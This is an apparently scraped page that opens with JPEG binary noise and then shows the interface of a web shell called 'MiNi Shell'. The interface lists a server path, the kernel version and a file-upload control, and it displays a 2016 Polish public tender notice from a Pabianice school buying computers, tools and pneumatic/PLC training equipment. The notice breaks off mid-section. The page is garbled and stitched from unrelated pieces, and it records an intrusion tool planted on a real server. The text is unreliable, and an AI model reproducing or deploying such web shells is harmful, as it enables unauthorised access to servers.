JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160920/311008-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 311008 - 2016
              z dnia 2016-09-20 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Pabianice: ZAKUP URZĄDZEŃ, SPRZĘTU, PRZYRZĄDÓW ORAZ WYPOSAŻENIA (W TYM KOMPUTEROWEGO I MULTIMEDIALNEGO) W RAMACH REALIZACJI PROJEKTU PN. CHCĘ BYĆ NAJLEPSZY W SWOIM ZAWODZIE<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Regionalny Program Operacyjny Województwa Łódzkiego, Oś Priorytetowa XI Edukacja, Kwalifikacje, Umiejętności, Działanie XI. 3 Kształcenie zawodowe</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zespół Szkół Nr 1 im. Jana Kilińskiego w Pabianicach, krajowy numer identyfikacyjny
              47205765500000, ul.
              ul. Piotra Skargi 
              21,
              95200  
              Pabianice, woj.
              łódzkie, państwo
              , tel.
              42 215 41 73, e-mail
              sekretariat@zs1.pabianice.com.pl, faks
              42 215 34 74.
              <br />
              Adres strony internetowej (URL): http://www.mechanik.edu.pl/<br />
                Adres profilu nabywcy:

                http://www.mechanik.edu.pl/<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: szkoła publiczna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.mechanik.edu.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.mechanik.edu.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />osobiście lub listownie lub kurierem<br />
                Adres:
                <br />95-200 Pabianice, ul. Piotra Skargi 21</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ZAKUP URZĄDZEŃ, SPRZĘTU, PRZYRZĄDÓW ORAZ WYPOSAŻENIA (W TYM KOMPUTEROWEGO I MULTIMEDIALNEGO) W RAMACH REALIZACJI PROJEKTU PN. CHCĘ BYĆ NAJLEPSZY W SWOIM ZAWODZIE<br /><b>Numer referencyjny: </b>1/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />4<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest sprzedaż i dostawa transportem własnym i na własny koszt do siedziby Zamawiającego fabrycznie nowych urządzeń, sprzętu, przyrządów oraz wyposażenia (w tym sprzętu komputerowego i multimedialnego) w ramach realizacji projektu pn. Chcę być najlepszy w swoim zawodzie. Projekt pn. Chcę być najlepszy w swoim zawodzie jest realizowany w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego, Oś Priorytetowa XI Edukacja, Kwalifikacje, Umiejętności, Działanie XI. 3 Kształcenie zawodowe.
2. Zamawiający dopuszcza możliwość złożenia ofert częściowych według poniżej określonego podziału:
2.1. Część I - Sprzęt komputerowy i multimedialny:
1) projektor multimedialny  szt. 1,
2) drukarka atramentowa A3 ze skanerem  szt. 1,
3) drukarka laserowa A4 ze skanerem i kopiarką  szt. 2,
4) tablica mobilna fipchart  szt. 2,
5) laptop przystosowany do współpracy ze sterownikami  szt. 8,
6) monitor  szt. 3,
7) drukarka laserowa sieciowa A4 ze skanerem i kopiarką  szt. 1.
2.2. Część II - Narzędzia, przyrządy i materiały mechaniczne:
1) głębokościomierz mikrometryczny  szt. 8,
2) płytki wzorcowe klasa 2  szt. 3,
3) czujnik krawędziowy  szt. 1,
4) czujnik krawędziowy 2D ze wskaźnikiem świetlnym  szt. 1,
5) czujnik krawędziowy 3D ze wskaźnikiem świetlnym  szt. 1,
6) czujnik wysokości narzędzi i materiału CNC  szt. 1,
7) komplet średnicówek mikrometrycznych trójpunktowych  szt. 2, 
8) uchwyt tokarski 3-szczękowy 80 mm  szt. 1,
9) uchwyt tokarski 3-szczękowy 125 mm  szt. 3,
10) praska montażowa ręczna  szt. 3,
11) imadło maszynowe 125 mm  szt. 2,
12) wiertarka stołowa  szt. 2,
13) frez do rowków fi3  szt. 14,
14) frez do rowków fi4  szt. 14,
15) frez do rowków fi5  szt. 10,
16) frez do rowków fi6  szt. 10,
17) frez do rowków fi7  szt. 10,
18) frez do rowków fi8  szt. 8,
19) frez do rowków fi10  szt. 8,
20) frez do rowków fi12  szt. 8,
21) frez do rowków fi14  szt. 8,
22) wiertło fi3  szt. 20,
23) wiertło fi4  szt. 20,
24) wiertło fi5  szt. 20,
25) wiertło fi6  szt. 20,
26) wiertło fi7  szt. 10,
27) wiertło fi8  szt. 10,
28) wiertło fi10  szt. 10,
29) frez walcowo-czołowy nasadzany  szt. 7,
30) frez składany trzpieniowy 2-ostrzowy walcowo-czołowy wraz z kompletem płytek skrawających  szt. 8,
31) nóż tokarski składany do toczenia wewnętrznego  szt. 10,
32) płytka do toczenia CCMT 060204  szt. 30,
33) oprawka narzędziowa  szt. 10,
34) płytka do toczenia DCMT 11T304  szt. 10,
35) oprawka narzędziowa  szt. 10,
36) płytka do toczenia CCMT 09T304  szt. 10,
37) oprawka narzędziowa  szt. 10,
38) płytka do toczenia VCMT 110304  szt. 10,
39) oprawka narzędziowa  szt. 10,
40) oprawka narzędziowa  szt. 10,
41) płytka do toczenia DCMT 070204  szt. 20.
2.3. Część III - Narzędzia, przyrządy i materiały elektryczne:
1) sprężarka  szt. 1,
2) stycznik cewka na napięcie  szt. 6,
3) przekaźnik elektryczny  szt. 6,
4) przekaźnik elektryczny czasowy - załącz po czasie  szt. 12,
5) przekaźnik elektryczny czasowy - wyłącz po czasie  szt. 12,
6) czujnik indukcyjny (styk NO)  szt. 12,
7) czujnik pojemnościowy (styk NO)  szt. 12,
8) czujnik fotoelektryczny refleksyjny (styk NO)  szt. 12,
9) czujnik fotoelektryczny odbiciowy (styk NO)  szt. 6,
10) magnetyczny czujnik krańcowy montowany na siłowniku (styk NO)  szt. 24, 
11) pneumoelektryczny czujnik ciśnienia ze stykiem NO  szt. 6,
12) przycisk sterowniczy monostabilny (styk NO)  szt. 12,
13) przycisk sterowniczy monostabilny (styk NC)  szt. 12,
14) przycisk sterowniczy bistabilny (styk NO)  szt. 12,
15) przycisk sterowniczy bistabilny (styk NC)  szt. 12,
16) łącznik krańcowy z rolką elektryczny (styk NO i NC)  szt. 24,
17) lampka sygnalizacyjna zielona 24V DC  szt. 12,
18) lampka sygnalizacyjna czerwona 24V DC  szt. 12,
19) lampka sygnalizacyjna żółta 24V DC  szt. 12,
20) zespół przygotowania powietrza  szt. 6,
21) siłownik pneumatyczny dwustronnego działania bezsmarowy z magnetycznym tłokiem  szt. 12,
22) siłownik pneumatyczny jednostronnego działania bezsmarowy ze sprężyną 32x50 z zaworem dławiąco zwrotnym G1/8-6  szt. 12,
23) zawór pneumatyczny 3/2 monostabilny, sterownie ręczne ze sprężyną zwrotną NO  szt. 6,
24) zawór pneumatyczny 3/2 monostabilny, sterownie ręczne ze sprężyną zwrotną NC  szt. 6,
25) zawór pneumatyczny 3/2 bistabilny, sterowanie pneumatyczne  szt. 6,
26) zawór pneumatyczny 3/2 monostabilny, sterowanie pneumatyczne NO  szt. 6,
27) zawór pneumatyczny 3/2 monostabilny, sterowanie pneumatyczne NC  szt. 6,
28) zawór pneumatyczny 3/2 monostabilny, sterowanie cewka 24 V DC NC  szt. 6,
29) zawór pneumatyczny 3/2 monostabilny, sterowanie cewka 24 V DC NO  szt. 6,
30) zawór pneumatyczny 5/2 bistabilny, sterowanie pneumatyczne  szt. 12,
31) zawór pneumatyczny 5/2 momostabilny, sterowanie pneumatyczne  szt. 12,
32) zawór pneumatyczny 5/2 momostabilny, sterowanie ręczne przyciskiem  szt. 6,
33) elektrozawór pneumatyczny 5/2 bistabilny, sterowany dwoma cewkami 24 V DC  szt. 12,
34) elektrozawór pneumatyczny 5/2 monostabilny, sterowany cewką 24 V DC  szt. 6,
35) łącznik krańcowy pneumatyczny (styk NO)  szt. 12,
36) łącznik krańcowy pneumatyczny (styk NC)  szt. 12,
37) blok rozdzielający  szt. 12,
38) zawór zwrotno-dławiący  szt. 18,
39) zawór szybkiego spustu  szt. 6,
40) zawór bezpieczeństwa  szt. 6,
41) zawór redukcyjny  szt. 6,
42) zawór zwrotny  szt. 6,
43) zawór odcinający powietrza  szt. 6,
44) zawór czasowy (styk NO)  szt. 6,
45) zawór czasowy (styk NC)  szt. 6,
46) zawór logiczny AND  szt. 12,
47) zawór logiczny OR  szt. 12,
48) komplet narzędzi monterskich  szt. 6,
49) próbnik napięcia  szt. 6,
50) sterownik szkolny Logo 8 Siemens lub równoważny typu 12/24RCE spełniający podane w tabeli parametry  szt. 6,
51) moduł rozszerzeń kompatybilny z zestawem sterowników typu Logo 8 lub 12/24 RCE  szt. 6,
52) sterownik przemysłowy S7-1200 produkcji Siemens lub równoważny  szt. 6,
53) gniazdo banankowe czarne  szt. 300,
54) gniazdo banankowe czerwone  szt. 300,
55) zestaw profili aluminiowych do budowy stanowiska PLC  kpl. 12,
56) przełącznik dźwigniowy mono i bistbilny (zadajnik sygnałów na sterownik PLC)  szt. 120,
2.4. Część IV - Tablice dydaktyczne:
1) system sterowania silnikiem ZS typu Common Rail  szt. 1,
2) elementy układów elektrycznych pojazdów  szt. 1,
3) tester diagnostyczny  szt. 1. 
Szczegółowy opis przedmiotu zamówienia, w tym jego charakterystyka, został zawarty w załączniku nr 1 do specyfikacji istotnych warunków zamówienia.
Zamawiający nie określa maksymalnej ilości części, na które może Wykonawca złożyć ofertę.
3. Zamawiający wymaga, aby przedmiot zamówienia był fabrycznie nowy, wolny od wad technicznych i prawnych, dobrej, jakości, dopuszczony do obrotu, zapakowany w oryginalne opakowanie dla danego produktu, zaopatrzone w etykiety identyfikujące dany produkt, określający jego parametry techniczne, jakościowe, funkcjonalne oraz użytkowe.
4. Na etapie dostawy, Wykonawca dostarczy wraz z przedmiotem zamówienia instrukcję eksploatacji i konserwacji urządzeń (instrukcję obsługi, charakterystyki techniczne urządzeń, instrukcje przeglądów i napraw, karty gwarancyjne urządzeń)  wszystkie dokumenty w języku polskim,
5. Miejsce dostawy przedmiotu zamówienia: Pabianice  ul. Piotra Skargi 21.
6. Realizacja zamówienia publicznego nastąpi do 30 dni od daty podpisania umowy. Zamawiający informuje, że planowany termin podpisania umowy to druga dekada października 2016 roku. Ostateczny termin realizacji zależeć będzie od oferty wybranego Wykonawcy. Zamawiający dopuszcza możliwość skrócenia terminu realizacji przedmiotu zamówienia zgodnie z treścią wybranej oferty, co będzie stanowiło element oceny merytorycznej na etapie wyboru najkorzystniejszej oferty  vide kryterium oceny ofert.
7. Kody CPV: 
a) 38.65.21.00-1  Projektor,
b) 30.21.31.00-6 - Komputery przenośne,
c) 30.23.60.00-2  Różny sprzęt komputerowy,
d) 31.68.10.00-3 - Akcesoria elektryczne,
e) 38.41.00.00-2  Przyrządy pomiarowe,
f) 44.51.00.00-8  Narzędzia.
8. Wykonawca udzieli Zamawiającemu minimum 12 - miesięcznej gwarancji na dostarczony przedmiot zamówienia, datą rozpoczęcia okresu gwarancji będzie data podpisania końcowego bezusterkowego protokołu odbioru - dostawy, udzielona gwarancja nie wyłącza odpowiedzialności Wykonawcy z tytułu rękojmi za wady przedmiotu umowy wynikającej z przepisów Kodeksu Cywilnego.
Ostateczny termin gwarancji zależeć będzie od oferty wybranego Wykonawcy. Zamawiający dopuszcza możliwość terminu gwarancji na zrealizowany przedmiot zamówienia zgodnie z treścią wybranej oferty, co będzie stanowiło element oceny merytorycznej na etapie wyboru najkorzystniejszej oferty  vide kryterium oceny ofert.
9. W okresie gwarancji, Wykonawca zgodnie z wymaganiami Zamawiającego, zobowiązany będzie, w przypadku wystąpienia usterki jakiegokolwiek elementu przedmiotu zamówienia do jego naprawy w terminie nie dłuższym niż 14 dni od zgłoszenia usterki. Reakcja Wykonawcy na dokonane przez Zamawiającego zgłoszenie  maksymalnie 24 godziny. 
10. Warunki finansowe rozliczeń:
a) Rozliczenie przedmiotu zamówienia nastąpi na podstawie potwierdzonego dowodu dostawy lub pobrania przez Zamawiającego.
b) Podane w ofercie wynagrodzenie jest stałe i nie podlega waloryzacji w trakcie obowiązywania umowy.
c) Wynagrodzenie będzie płatne przelewem w terminie min. 14 dni od daty otrzymania oryginału prawidłowo wystawionej faktury (rachunku). Ostateczny termin płatności zależeć będzie od oferty wybranego Wykonawcy. Zamawiający dopuszcza możliwość wydłużenia terminu płatności zgodnie z treścią wybranej oferty, co będzie stanowiło element oceny merytorycznej na etapie wyboru najkorzystniejszej oferty  vide kryterium oceny ofert.<br /><br /><b>II.5) Główny kod CPV: </b>44510000-8<br /><b> Dodatkowe kody CPV:</b>38652100-1,
                30213100-6,
                30236000-2,
                31681000-3,
                38410000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie formułuje specjalnych wymagań dla potwierdzenia spełnienia tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie formułuje specjalnych wymagań dla potwierdzenia spełnienia tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie formułuje specjalnych wymagań dla potwierdzenia spełnienia tego warunku<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Nie dotyczy</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Nie dotyczy<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Nie dotyczy</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz oferty - w zakresie wskazanym w specyfikacji istotnych warunków zamówienia (wzór w siwz),
2. Formularz cenowy - w zakresie wskazanym w specyfikacji istotnych warunków zamówienia (wzór w siwz),
3. Zobowiązanie podmiotu trzeciego, na którego zdolnościach lub sytuacji Wykonawca polega, o którym mowa w Rozdziale V, punkt 2.4, podpunkt a) niniejszej specyfikacji istotnych warunków zamówienia (jeśli dotyczy).
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
